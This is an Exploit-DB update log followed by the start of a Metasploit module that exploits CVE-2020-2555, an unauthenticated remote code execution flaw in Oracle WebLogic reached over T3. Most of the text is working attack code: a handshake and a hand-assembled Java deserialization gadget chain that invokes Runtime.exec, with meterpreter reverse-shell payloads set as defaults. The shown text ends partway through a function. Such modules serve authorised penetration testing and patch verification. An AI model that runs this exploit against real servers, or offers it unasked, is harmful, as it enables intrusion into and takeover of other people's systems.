DB: 2020-05-23

8 changes to exploits/shellcodes

Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)
Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)
Filetto 1.0 - 'FEAT' Denial of Service (PoC)
Druva inSync Windows Client 6.6.3 - Local Privilege Escalation
VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)

WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)
Dolibarr 11.0.3 - Persistent Cross-Site Scripting
Gym Management System 1.0 - Unauthenticated Remote Code Execution

exploits/multiple/remote/48508.rb

@@ -0,0 +1,784 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException',
+        'Description' => %q{
+          There exists a Java object deserialization vulnerability
+          in multiple versions of WebLogic.
+
+          Unauthenticated remote code execution can be achieved
+          by sending a serialized BadAttributeValueExpException object
+          over the T3 protocol to vulnerable WebLogic servers.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+        [
+          'Jang', # Vuln Discovery
+          'Y4er', # PoC
+          'Shelby Pace' # Metasploit Module
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2020-2555' ],
+            [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
+            [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
+          ],
+        'Platform' => %w[unix linux win],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Privileged'  => false,
+        'Targets' =>
+          [
+            [
+              'Windows',
+              {
+                'Platform' => 'win',
+                'Arch' => [ ARCH_X86, ARCH_X64 ],
+                'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Unix',
+              {
+                'Platform' => %w[unix linux],
+                'CmdStagerFlavor' => 'printf',
+                'Arch' => [ ARCH_X86, ARCH_X64 ],
+                'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+          ],
+        'DisclosureDate' => '2020-01-15',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([ Opt::RPORT(7001) ])
+  end
+
+  def check
+    connect
+
+    web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
+    sock.put(web_req)
+    sleep(2)
+    res = sock.get_once
+
+    versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ]
+
+    return CheckCode::Unknown('Failed to obtain response from service') unless res
+
+    /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
+    return CheckCode::Unknown('Failed to detect WebLogic') unless version
+
+    @version_no = Gem::Version.new(version)
+    print_status("WebLogic version detected: #{@version_no}")
+
+    return CheckCode::Appears if versions.include?(@version_no)
+
+    CheckCode::Detected('Version of WebLogic is not vulnerable')
+  ensure
+    disconnect
+  end
+
+  def exploit
+    super
+
+    connect
+    print_status('Sending handshake...')
+    t3_handshake
+
+    if target.name == 'Windows'
+      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
+      win_obj.prepend('cmd.exe /c ')
+      win_obj = build_payload_obj(win_obj)
+      t3_send(win_obj)
+    else
+      execute_cmdstager
+    end
+
+  ensure
+    disconnect
+  end
+
+  def t3_handshake
+    # t3 12.2.1\nAS:255
+    # \nHL:19\nMS:100000
+    # 00\n\n
+    shake = '74332031322e322e310a41533a323535'
+    shake << '0a484c3a31390a4d533a313030303030'
+    shake << '30300a0a'
+
+    sock.put([shake].pack('H*'))
+    sleep(1)
+    sock.get_once
+  end
+
+  def build_payload_obj(payload_data)
+    payload_obj = 'aced' # STREAM_MAGIC
+    payload_obj << '0005' # STREAM_VERSION
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002e' # Class name length: 46
+    payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException
+    payload_obj << '67656d656e742e426164'
+    payload_obj << '41747472696275746556'
+    payload_obj << '616c7565457870457863'
+    payload_obj << '657074696f6e'
+    payload_obj << 'd4e7daab632d4640' # SerialVersionUID
+    payload_obj << '020001' # Serialization flag, field num = 1
+    payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3
+    payload_obj << '76616c' # Field name: val
+    payload_obj << '740012' # String, length: 18
+    payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;
+    payload_obj << '7872' # end block data, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '6a6176612e6c616e672e' # java.lang.Exception
+    payload_obj << '457863657074696f6e'
+    payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID
+    payload_obj << '020000' # Serializable, No fields
+    payload_obj << '7872' # end block data, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable
+    payload_obj << '5468726f7761626c65'
+    payload_obj << 'd5c635273977b8cb' # SerialVersionUID
+    payload_obj << '030004' # ?, then 4 fields
+    payload_obj << '4c0005' # Field type: Object, field name length: 5
+    payload_obj << '6361757365' # Field name: cause
+    payload_obj << '740015' # String, length: 21
+    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable;
+    payload_obj << '2f5468726f7761626c653b'
+    payload_obj << '4c000d' # Field type: Object, field name length: 13
+    payload_obj << '64657461696c4d657373616765' # Field name: detailMessage
+    payload_obj << '740012' # String, length: 18
+    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
+    payload_obj << '2f537472696e673b'
+    payload_obj << '5b000a' # Field type: 5b = array, field name length: 10
+    payload_obj << '737461636b5472616365' # Field name: stackTrace
+    payload_obj << '74001e' # String, length: 30
+    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement;
+    payload_obj << '672f537461636b547261'
+    payload_obj << '6365456c656d656e743b'
+    payload_obj << '4c0014' # Field type: Object, field name length: 20
+    payload_obj << '73757070726573736564' # Field name: suppressedExceptions
+    payload_obj << '457863657074696f6e73'
+    payload_obj << '740010' # String, length: 16
+    payload_obj << '4c6a6176612f7574696c' # Ljava/util/List;
+    payload_obj << '2f4c6973743b'
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0008' # handle?
+    payload_obj << '7075' # TC_NULL, TC_ARRAY
+    payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30
+    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement;
+    payload_obj << '672e537461636b547261'
+    payload_obj << '6365456c656d656e743b'
+    payload_obj << '02462a3c3cfd2239' # SerialVersionUID
+    payload_obj << '020000' # Serializable, No fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000001'
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '001b' # Class name length: 27
+    payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement
+    payload_obj << '537461636b5472616365'
+    payload_obj << '456c656d656e74'
+    payload_obj << '6109c59a2636dd85' # SerialVersionUID
+    payload_obj << '020004' # Serializable, 4 fields
+    payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10
+    payload_obj << '6c696e654e756d626572' # lineNumber
+    payload_obj << '4c000e' # Field type: Object, field name length: 14
+    payload_obj << '6465636c6172696e6743'
+    payload_obj << '6c617373' # declaringClass
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0005' # handle
+    payload_obj << '4c0008' # Field type: Object, field name length: 8
+    payload_obj << '66696c654e616d65' # fileName
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0005' # handle
+    payload_obj << '4c000a' # Field type: Object, field name length: 10
+    payload_obj << '6d6574686f644e616d65' # methodName
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0005' # handle
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000028'
+
+    class_name = Rex::Text.rand_text_alphanumeric(8..14)
+    formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+
+    payload_obj << '74' # String
+    payload_obj << class_name.length.to_s(16).rjust(4, '0')
+    payload_obj << formatted_class  # Originally Weblogic_2555 -> PoC class name
+    payload_obj << '74' # String
+    payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0')
+    payload_obj << formatted_class # Originally Weblogic_2555.java
+    payload_obj << '2e6a617661' # .java
+    payload_obj << '740004' # String, length: 4
+    payload_obj << '6d61696e' # main
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0026' # Class name length: 38
+    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList
+    payload_obj << '436f6c6c656374696f6e'
+    payload_obj << '7324556e6d6f64696669'
+    payload_obj << '61626c654c697374'
+    payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID
+    payload_obj << '020001' # Serializable, 1 field
+    payload_obj << '4c0004' # Field type: Object, field name length: 4
+    payload_obj << '6c697374' # list
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0007' # handle
+    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '002c' # Class name length: 44
+    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection
+    payload_obj << '436f6c6c656374696f6e'
+    payload_obj << '7324556e6d6f64696669'
+    payload_obj << '61626c65436f6c6c6563'
+    payload_obj << '74696f6e'
+    payload_obj << '19420080cb5ef71e' # SerialVersionUID
+    payload_obj << '020001' # Serializable, 1 field
+    payload_obj << '4c0001' # Field type: Object, field name length: 1
+    payload_obj << '63' # Field name: c
+    payload_obj << '740016' # String, length: 22
+    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection;
+    payload_obj << '2f436f6c6c656374696f'
+    payload_obj << '6e3b'
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList
+    payload_obj << '41727261794c697374'
+    payload_obj << '7881d21d99c7619d' # SerialVersionUID
+    payload_obj << '030001' # ?, 1 field
+    payload_obj << '490004' # Field type: Integer, field name length: 4
+    payload_obj << '73697a65' # size
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000000'
+    payload_obj << '7704' # TC_BLOCKDATA, length: 4
+    payload_obj << '00000000'
+    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
+    payload_obj << '007e0015' # handle
+    payload_obj << '78' # TC_ENDBLOCKDATA
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0024' # Class name length: 36
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter
+    payload_obj << '6f6c2e7574696c2e6669'
+    payload_obj << '6c7465722e4c696d6974'
+    payload_obj << '46696c746572'
+    payload_obj << limit_filter_uid # SerialVersionUID
+    payload_obj << '020006' # Serializable, 6 fields
+    payload_obj << '49000b' # Field type: Integer, field name length: 11
+    payload_obj << '6d5f635061676553697a65' # m_cPageSize
+    payload_obj << '490007' # Field type: Integer, field name length: 7
+    payload_obj << '6d5f6e50616765' # m_nPage
+    payload_obj << '4c000c' # Field type: Object, field name length: 12
+    payload_obj << '6d5f636f6d70617261746f72' # m_comparator
+    payload_obj << '740016' # String, length: 22
+    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator;
+    payload_obj << '2f436f6d70617261746f'
+    payload_obj << '723b'
+    payload_obj << '4c0008' # Field type: Object, field name length: 8
+    payload_obj << '6d5f66696c746572' # m_filter
+    payload_obj << '74001a' # String, length: 26
+    payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter;
+    payload_obj << '736f6c2f7574696c2f46'
+    payload_obj << '696c7465723b'
+    payload_obj << '4c000f' # Field type: Object, field name length: 15
+    payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom
+    payload_obj << '6f74746f6d'
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0001' # handle
+    payload_obj << '4c000c' # Field type: Object, field name length: 12
+    payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0001' # handle
+
+    unless @version_no == Gem::Version.new('12.1.3.0.0')
+      payload_obj << add_class_desc
+    end
+
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000000'
+    payload_obj << '00000000'
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002c' # Class name length: 44
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor
+    payload_obj << '6f6c2e7574696c2e6578'
+    payload_obj << '74726163746f722e4368'
+    payload_obj << '61696e65644578747261'
+    payload_obj << '63746f72'
+    payload_obj << chained_extractor_uid # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '0036' # Class name length: 54
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor
+    payload_obj << '6f6c2e7574696c2e6578'
+    payload_obj << '74726163746f722e4162'
+    payload_obj << '737472616374436f6d70'
+    payload_obj << '6f736974654578747261'
+    payload_obj << '63746f72'
+    payload_obj << '086b3d8c05690f44' # SerialVersionUID
+    payload_obj << '020001' # Serializable, 1 field
+    payload_obj << '5b000c' # Field type: Array, field name length: 12
+    payload_obj << '6d5f61457874726163746f72' # m_aExtractor
+    payload_obj << '740023' # String, length: 35
+    payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor;
+    payload_obj << '6f736f6c2f7574696c2f'
+    payload_obj << '56616c75654578747261'
+    payload_obj << '63746f723b'
+    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '002d' # Class name length: 45
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor
+    payload_obj << '6f6c2e7574696c2e6578'
+    payload_obj << '74726163746f722e4162'
+    payload_obj << '73747261637445787472'
+    payload_obj << '6163746f72'
+    payload_obj << abstract_extractor_uid # SerialVersionUID
+    payload_obj << '020001' # Serializable, 1 field
+    payload_obj << '490009' # Field type: Integer, field name length: 9
+    payload_obj << '6d5f6e546172676574' # m_nTarget
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000000'
+    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0032' # Class name length: 50
+    payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor;
+    payload_obj << '6f736f6c2e7574696c2e'
+    payload_obj << '657874726163746f722e'
+    payload_obj << '5265666c656374696f6e'
+    payload_obj << '457874726163746f723b'
+    payload_obj << 'dd8b89aed70273ca' # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000003'
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002f' # Class name length: 47
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor
+    payload_obj << '6f6c2e7574696c2e6578'
+    payload_obj << '74726163746f722e5265'
+    payload_obj << '666c656374696f6e4578'
+    payload_obj << '74726163746f72'
+    payload_obj << reflection_extractor_uid # SerialVersionUID
+    payload_obj << '02000' # Serializable, variable fields orig: 020002
+    payload_obj << reflect_extract_count
+    payload_obj << '5b0009' # Field type: Array, field name length: 9
+    payload_obj << '6d5f616f506172616d' # m_aoParam
+    payload_obj << '740013' # String, length: 19
+    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object;
+    payload_obj << '672f4f626a6563743b'
+    payload_obj << add_sect
+    payload_obj << '4c0009' # Object, length: 9
+    payload_obj << '6d5f734d6574686f64' # m_sMethod
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0005' # handle
+    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
+    payload_obj << (change_handle? ? '007e001d' : '007e001e')
+    payload_obj << '00000000'
+    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object;
+    payload_obj << '672e4f626a6563743b'
+    payload_obj << '90ce589f1073296c' # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000002'
+    payload_obj << '74000a' # String, length: 10
+    payload_obj << '67657452756e74696d65' # getRuntime
+    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0012' # Class name length: 18
+    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class;
+    payload_obj << '672e436c6173733b'
+    payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000000'
+    payload_obj << add_tc_null
+    payload_obj << '740009' # String, length: 9
+    payload_obj << '6765744d6574686f64' # getMethod
+    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
+    payload_obj << (change_handle? ? '007e0021' : '007e0022')
+    payload_obj << '00000000'
+    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
+    payload_obj << (change_handle? ? '007e0024' : '007e0025')
+    payload_obj << '00000002' # array size: 2
+    payload_obj << '7075' # TC_NULL, TC_ARRAY
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << (change_handle? ? '007e0024' : '007e0025')
+    payload_obj << '00000000'
+    payload_obj << add_tc_null
+    payload_obj << '740006' # TC_STRING, length: 6
+    payload_obj << '696e766f6b65' # invoke
+    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
+    payload_obj << (change_handle? ? '007e0021' : '007e0022')
+    payload_obj << '00000000'
+    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
+    payload_obj << (change_handle? ? '007e0024' : '007e0025')
+    payload_obj << '00000001'
+    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String;
+    payload_obj << '672e537472696e673b'
+    payload_obj << 'add256e7e91d7b47' # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '00000003'
+
+    payload_bin = format_payload(payload_data)
+    payload_obj << payload_bin
+
+    # Original data
+    # ---------------------------
+    # payload_obj << '740007'                             # String, length: 7
+    # payload_obj << '2f62696e2f7368'                     # /bin/sh
+    # payload_obj << '740002'                             # String, length: 2
+    # payload_obj << '2d63'                               # -c
+    # payload_obj << '740017'                             # String, length: 23
+    # payload_obj << '746f756368202f746d70'               # touch /tmp/blah_ze_blah
+    # payload_obj << '2f626c61685f7a655f62'
+    # payload_obj << '6c6168'
+    # ---------------------------
+    payload_obj << add_tc_null
+
+    payload_obj << '740004' # String, length: 4
+    payload_obj << '65786563' # exec
+    payload_obj << '7070' # TC_NULL, TC_NULL
+    payload_obj << '7672' # TC_CLASS, TC_CLASSDESC
+    payload_obj << '0011' # Class name length: 17
+    payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime
+    payload_obj << '52756e74696d65'
+    payload_obj << '00000000000000000000'
+    payload_obj << '00'
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+  end
+
+  def change_handle?
+    @version_no == Gem::Version.new('12.1.3.0.0')
+  end
+
+  def limit_filter_uid
+    case @version_no
+    when Gem::Version.new('12.1.3.0.0')
+      '99022596d7b45953'
+    when Gem::Version.new('12.2.1.3.0')
+      'ab2901b976c4e271'
+    else
+      '954e4590be89865f'
+    end
+  end
+
+  def chained_extractor_uid
+    case @version_no
+    when Gem::Version.new('12.1.3.0.0')
+      '889f81b0945d5b7f'
+    when Gem::Version.new('12.2.1.3.0')
+      '06ee10433a4cc4b4'
+    else
+      '435b250b72f63db5'
+    end
+  end
+
+  def abstract_extractor_uid
+    case @version_no
+    when Gem::Version.new('12.1.3.0.0')
+      '658195303e723821'
+    when Gem::Version.new('12.2.1.3.0')
+      '752289ad4d460138'
+    else
+      '9b1be18ed70100e5'
+    end
+  end
+
+  def reflection_extractor_uid
+    case @version_no
+    when Gem::Version.new('12.1.3.0.0')
+      'ee7ae995c02fb4a2'
+    when Gem::Version.new('12.2.1.3.0')
+      '87973791b26429dd'
+    else
+      '1f62f564b951b614'
+    end
+  end
+
+  def reflect_extract_count
+    case @version_no
+    when Gem::Version.new('12.2.1.3.0')
+      '3'
+    else
+      '2'
+    end
+  end
+
+  def add_sect
+    sect = ''
+
+    if @version_no == Gem::Version.new('12.2.1.3.0')
+      sect << '4c0011' # Object, length: 17
+      sect << '6d5f657874726163746f' # m_extractorCached
+      sect << '72436163686564'
+      sect << '71' # TC_REFERENCE
+      sect << '007e0001' # handle
+    end
+
+    sect
+  end
+
+  def add_class_desc
+    class_desc = ''
+    class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    class_desc << '0034' # Class name length: 52
+    class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter
+    class_desc << '6f6c2e7574696c2e6669'
+    class_desc << '6c7465722e4162737472'
+    class_desc << '61637451756572795265'
+    class_desc << '636f7264657246696c74'
+    class_desc << '6572'
+    class_desc << 'f3b98201f680eb90' # SerialVersionUID
+    class_desc << '020000' # Serializable, no fields
+  end
+
+  def add_tc_null
+    return '70' if @version_no == Gem::Version.new('12.2.1.3.0')
+
+    ''
+  end
+
+  def t3_send(payload_obj)
+    print_status('Sending object...')
+
+    request_obj = '000009f3' # Original packet length
+    request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
+    request_obj << 'ffffffffffffffff'
+    request_obj << '00000071'
+    request_obj << '0000ea60'
+    request_obj << '00000018432ec6'
+    request_obj << 'a2a63985b5af7d63e643'
+    request_obj << '83f42a6d92c9e9af0f94'
+    request_obj << '72027973720078720178'
+    request_obj << '720278700000000c0000'
+    request_obj << '00020000000000000000'
+    request_obj << '00000001007070707070'
+    request_obj << '700000000c0000000200'
+    request_obj << '00000000000000000000'
+    request_obj << '01007006'
+    request_obj << 'fe010000' # separator
+    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    request_obj << '001d' # Class name length: 29
+    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
+    request_obj << '6a766d2e436c61737354'
+    request_obj << '61626c65456e747279'
+    request_obj << '2f52658157f4f9ed' # SerialVersionUID
+    request_obj << '0c0000' # flags?
+    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
+    request_obj << '0024' # Class name length: 36
+    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
+    request_obj << '6f6d6d6f6e2e696e7465'
+    request_obj << '726e616c2e5061636b61'
+    request_obj << '6765496e666f'
+    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
+    request_obj << '020009' # Serializable, 9 fields
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72' # major
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72' # minor
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174' # patchUpdate
+    request_obj << '65'
+    request_obj << '49000c' # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174' # rollingPatch
+    request_obj << '6368'
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163' # servicePack
+    request_obj << '6b'
+    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950' # temporaryPatch
+    request_obj << '61746368'
+    request_obj << '4c0009' # Field type: Object, field name length: 9
+    request_obj << '696d706c5469746c65' # implTitle
+    request_obj << '740012' # String, length: 18
+    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
+    request_obj << '2f537472696e673b'
+    request_obj << '4c000a' # Field type: Object, field name length: 10
+    request_obj << '696d706c56656e646f72' # implVendor
+    request_obj << '71007e0003' # TC_REFERENCE, handle
+    request_obj << '4c000b' # Field type: Object, field name length: 11
+    request_obj << '696d706c56657273696f6e' # implVersion
+    request_obj << '71007e0003' # TC_REFERENCE, handle
+    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    request_obj << '7702' # TC_ENDBLOCKDATA
+    request_obj << '000078'
+    request_obj << 'fe010000' # separator
+
+    request_obj << payload_obj
+
+    request_obj << 'fe010000' # separator
+    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    request_obj << '001d' # Class name length: 29
+    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
+    request_obj << '6a766d2e436c61737354'
+    request_obj << '61626c65456e747279'
+    request_obj << '2f52658157f4f9ed' # SerialVersionUID
+    request_obj << '0c0000'
+    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
+    request_obj << '0021' # Class name length: 33
+    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
+    request_obj << '6f6d6d6f6e2e696e7465'
+    request_obj << '726e616c2e5065657249'
+    request_obj << '6e666f'
+    request_obj << '585474f39bc908f1' # SerialVersionUID
+    request_obj << '020007' # Serializable, 7 fields
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72' # major
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72' # minor
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174' # patchUpdate
+    request_obj << '65'
+    request_obj << '49000c' # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174' # rollingPatch
+    request_obj << '6368'
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163' # servicePack
+    request_obj << '6b'
+    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950' # temporaryPatch
+    request_obj << '61746368'
+    request_obj << '5b0008' # Field type: Array, field name length: 8
+    request_obj << '7061636b61676573' # packages
+    request_obj << '740027' # String, length: 39
+    request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
+    request_obj << '2f636f6d6d6f6e2f696e'
+    request_obj << '7465726e616c2f506163'
+    request_obj << '6b616765496e666f3b'
+    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    request_obj << '0024' # Class name length: 36
+    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
+    request_obj << '6f6d6d6f6e2e696e7465'
+    request_obj << '726e616c2e5665727369'
+    request_obj << '6f6e496e666f'
+    request_obj << '972245516452463e' # SerialVersionUID
+    request_obj << '020003' # Serializable, 3 fields
+    request_obj << '5b0008' # Field type: Array, field name length: 8
+    request_obj << '7061636b61676573' # packages
+    request_obj << '71007e0003' # TC_REFERENCE, handle
+    request_obj << '4c000e' # Field type: Object, field name length: 14
+    request_obj << '72656c65617365566572' # releaseVersion
+    request_obj << '73696f6e'
+    request_obj << '740012' # String, length: 18
+    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
+    request_obj << '2f537472696e673b'
+    request_obj << '5b0012' # Field type: Array, field name length: 18
+    request_obj << '76657273696f6e496e66' # versionInfoAsBytes
+    request_obj << '6f41734279746573'
+    request_obj << '740002' # String, length: 2
+    request_obj << '5b42' # [B
+    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    request_obj << '0024' # Class name length: 36
+    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
+    request_obj << '6f6d6d6f6e2e696e7465'
+    request_obj << '726e616c2e5061636b61'
+    request_obj << '6765496e666f'
+    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
+    request_obj << '020009' # Serializable, 9 fields
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72' # major
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72' # minor
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174' # patchUpdate
+    request_obj << '65'
+    request_obj << '49000c' # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174' # rollingPatch
+    request_obj << '6368'
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163' # servicePack
+    request_obj << '6b'
+    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950' # temporaryPatch
+    request_obj << '61746368'
+    request_obj << '4c0009' # Field type: Object, field name length: 9
